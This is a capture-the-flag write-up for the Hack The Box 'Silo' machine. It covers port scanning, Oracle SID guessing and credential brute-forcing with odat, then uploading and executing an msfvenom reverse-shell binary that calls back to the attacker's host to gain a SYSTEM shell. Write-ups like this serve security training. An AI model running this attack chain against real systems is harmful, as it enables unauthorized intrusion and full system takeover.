Silo

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.82 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Wed Mar  9 10:01:38 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.82
Warning: 10.10.10.82 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.82
Host is up (0.050s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
5985/tcp  open  wsman
8080/tcp  open  http-proxy
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown
49161/tcp open  unknown
49162/tcp open  unknown

# Nmap done at Wed Mar  9 10:01:55 2022 -- 1 IP address (1 host up) scanned in 17.85 seconds

As we see, there are a lot of ports open. Let's try to obtain more information about the services and versions running on those ports.

nmap -sC -sV -p80,135,139,445,1521,5985,8080,47001,49152,49153,49154,49155,49159,49160,49161,49162 10.10.10.82 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Wed Mar  9 10:04:10 2022 as: nmap -sCV -p80,135,139,445,1521,5985,8080,47001,49152,49153,49154,49155,49159,49160,49161,49162 -oN targeted 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.048s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp  open  http         Oracle XML DB Enterprise Edition httpd
|_http-server-header: Oracle XML DB/Oracle Database
|_http-title: 400 Bad Request
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=XDB
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   3.0.2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-03-09T09:06:20
|_  start_date: 2022-03-09T07:34:37

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar  9 10:06:22 2022 -- 1 IP address (1 host up) scanned in 132.05 seconds

If we enumerate the SMB service with crackmapexec, we'll see the machine is a Windows Server 2012 R2 Standard 9600 x64.

crackmapexec smb 10.10.10.82

SMB         10.10.10.82     445    SILO             [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)

Exploitation

In port 1521 there is an Oracle TNS listener. We can enumerate Oracle with the odat tool. It is a bit tedious to install it, but let's do it. First, let's clone it's Github repository.

git clone https://github.com/quentinhardy/odat

Then we'll go to the odat/ directory and execute the following commands.

cd odat/
git submodule init
git submodule update

Now, we'll have to install some libraries.

sudo apt-get install libaio1 python3-dev alien python3-pip

As we saw with crackmapexec, the machine has a x64 bit architecture. So we'll go to this website and download the following files.

Now that we have all these .rpm files, we will have to use alien to convert them to .deb file.

alien --to-deb *.rpm

Once we have the .deb files, we'll install them with dpkg.

dpkg -i *.deb

Next, let's install a python module.

pip3 install cx_Oracle

Then, we'll export some environment variables.

export ORACLE_HOME=/usr/lib/oracle/21/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH

Then, install some more libraries and modules.

apt-get install python3-scapy
pip3 install colorlog termcolor pycrypto passlib python-libnmap
pip3 install argcomplete && sudo activate-global-python-argcomplete

And finally, we could run the odat tool.

If an error appears saying that a module is missing, you can always search for it on the internet.

python3 odat.py --help

usage: odat.py [-h] [--version]
               {all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
               ...

            _  __   _  ___ 
           / \|  \ / \|_ _|
          ( o ) o ) o || | 
           \_/|__/|_n_||_| 
-------------------------------------------
  _        __           _           ___ 
 / \      |  \         / \         |_ _|
( o )       o )         o |         | | 
 \_/racle |__/atabase |_n_|ttacking |_|ool 
-------------------------------------------

By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com)

positional arguments:
  {all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
                      
                      Choose a main command
    all               to run all modules in order to know what it is possible to do
    tnscmd            to communicate with the TNS listener
    tnspoison         to exploit TNS poisoning attack (SID required)
    sidguesser        to know valid SIDs
    snguesser         to know valid Service Name(s)
    passwordguesser   to know valid credentials
    utlhttp           to send HTTP requests or to scan ports
    httpuritype       to send HTTP requests or to scan ports
    utltcp            to scan ports
    ctxsys            to read files
    externaltable     to read files or to execute system commands/scripts
    dbmsxslprocessor  to upload files
    dbmsadvisor       to upload files
    utlfile           to download/upload/delete files
    dbmsscheduler     to execute system commands without a standard output
    java              to execute system commands
    passwordstealer   to get hashed Oracle passwords
    oradbg            to execute a bin or script
    dbmslob           to download files
    stealremotepwds   to steal hashed passwords thanks an authentication sniffing (CVE-2012-3137)
    userlikepwd       to try each Oracle username stored in the DB like the corresponding pwd
    smb               to capture the SMB authentication
    privesc           to gain elevated access
    cve               to exploit a CVE
    search            to search in databases, tables and columns
    unwrapper         to unwrap PL/SQL source code (no for 9i version)
    clean             clean traces and logs

optional arguments:
  -h, --help          show this help message and exit
  --version           show program's version number and exit

To perform any attack with odat, we'll need a SID. So we could use the sidguesser option to discover valid SIDs.

python3 odat.py sidguesser -s 10.10.10.82

-s server.

[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...                 #####################################################################################################################################################################  | ETA:  00:00:00

It found XE as a valid SID. Now we could try to brute force credentials with the passwordguesser option. I will be using the /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt metasploit dictionary. But, if you look at the dictionary, you'll see that it has the user password format. But odat only accept the user/password format. So let's change the dictionary format.

cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt | tr ' ' '/' > dictionary

Now we could brute force credentials with odat.

python3 odat.py passwordguesser -s 10.10.10.82 -d XE --accounts-file dictionary

-s server.
-d oracle System ID (SID).
--accounts-file file containing Oracle credentials.

[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
12:36:22 WARNING -: The line 'jl/jl/\n' is not loaded in credentials list: ['jl', 'jl', '']
12:36:22 WARNING -: The line 'ose$http$admin/invalid/password\n' is not loaded in credentials list: ['ose$http$admin', 'invalid', 'password']
The login brio_admin has already been tested at least once. What do you want to do:                                                                                                                                         | ETA:  --:--:-- 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c

[!] Notice: 'ctxsys' account is locked, so skipping this username for password                                                                                                                                              | ETA:  00:06:14 
[!] Notice: 'hr' account is locked, so skipping this username for password                                                                                                                                                  | ETA:  00:05:25 
[!] Notice: 'mdsys' account is locked, so skipping this username for password                                                                                                                                               | ETA:  00:03:44 
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password                                                                                                                                              | ETA:  00:02:55 
[!] Notice: 'dip' account is locked, so skipping this username for password########                                                                                                                                         | ETA:  00:02:49 
[!] Notice: 'system' account is locked, so skipping this username for password###############################################                                                                                               | ETA:  00:01:52 
[!] Notice: 'xdb' account is locked, so skipping this username for password#######################################################################################                                                          | ETA:  00:01:04 
[!] Notice: 'outln' account is locked, so skipping this username for password##################################################################################################                                             | ETA:  00:00:49 
[+] Valid credentials found: scott/tiger. Continue... #############################################################################################################################################################         | ETA:  00:00:09 
100% |######################################################################################################################################################################################################################| Time: 00:03:58 
[+] Accounts found on 10.10.10.82:1521/sid:XE: 
scott/tiger

It found the user scott and the password tiger. Now that we have some valid credentials, we could upload files with the utlfile option. Let's create a malicious binary with msfvenom which will send us a reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.5 lport=4444 -f exe -o shell.exe

-p indicates the type of payload.
lhost local host IP.
lport local port of the listener.
-f output format.
-o save the output to a file.

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe

Now, let's upload it to the machine with odat in the /Temp directory.

python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --putFile /Temp shell.exe shell.exe

-s server.
-d oracle System ID (SID).
-U oracle username.
-P oracle password.
--putFile put a file to the remote database server.

[1] (10.10.10.82:1521): Put the /home/alfa8sa/HTB/machines/silo/shell.exe local file in the /Temp folder like shell.exe on the 10.10.10.82 server
[-] Impossible to put the /home/alfa8sa/HTB/machines/silo/shell.exe file: `ORA-01031: insufficient privileges`

We get an error saying that we have insufficient privileges. Don't worry, we can user the --sysdba option to connect as the DBA system user.

python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --putFile /Temp shell.exe shell.exe --sysdba

-s server.
-d oracle System ID (SID).
-U oracle username.
-P oracle password.
--putFile put a file to the remote database server.
--sysdba connection as SYSDBA.

[1] (10.10.10.82:1521): Put the /home/alfa8sa/HTB/machines/silo/shell.exe local file in the /Temp folder like shell.exe on the 10.10.10.82 server
[+] The /home/alfa8sa/HTB/machines/silo/shell.exe file was created on the /Temp directory on the 10.10.10.82 server like the shell.exe file

Now that the binary is uploaded, we want to execute it. We can do it with the externaltable option. But first, let's set a netcat listener on port 4444.

nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

The following command will execute the shell.exe binary, and we will catch the reverse shell on the netcat listener.

python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --exec /Temp shell.exe --sysdba

-s server.
-d oracle System ID (SID).
-U oracle username.
-P oracle password.
--exec execute a system command on the remote system.
--sysdba connection as SYSDBA.

[1] (10.10.10.82:1521): Execute the shell.exe command stored in the /Temp path

As we get the shell as the nt authority\system user, all we have to do is reap the harvest and take both the user flag, and the root flag.

listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.82] 49184
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>type \users\phineas\desktop\user.txt
type \users\phineas\desktop\user.txt
ad6364c9113c9f1e283264078a94925c

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
8800ec7febdb70445e705e31dc7c0c33

Last updated 2 years ago

Was this helpful?

hashtagEnumeration

hashtagExploitation

Enumeration

Exploitation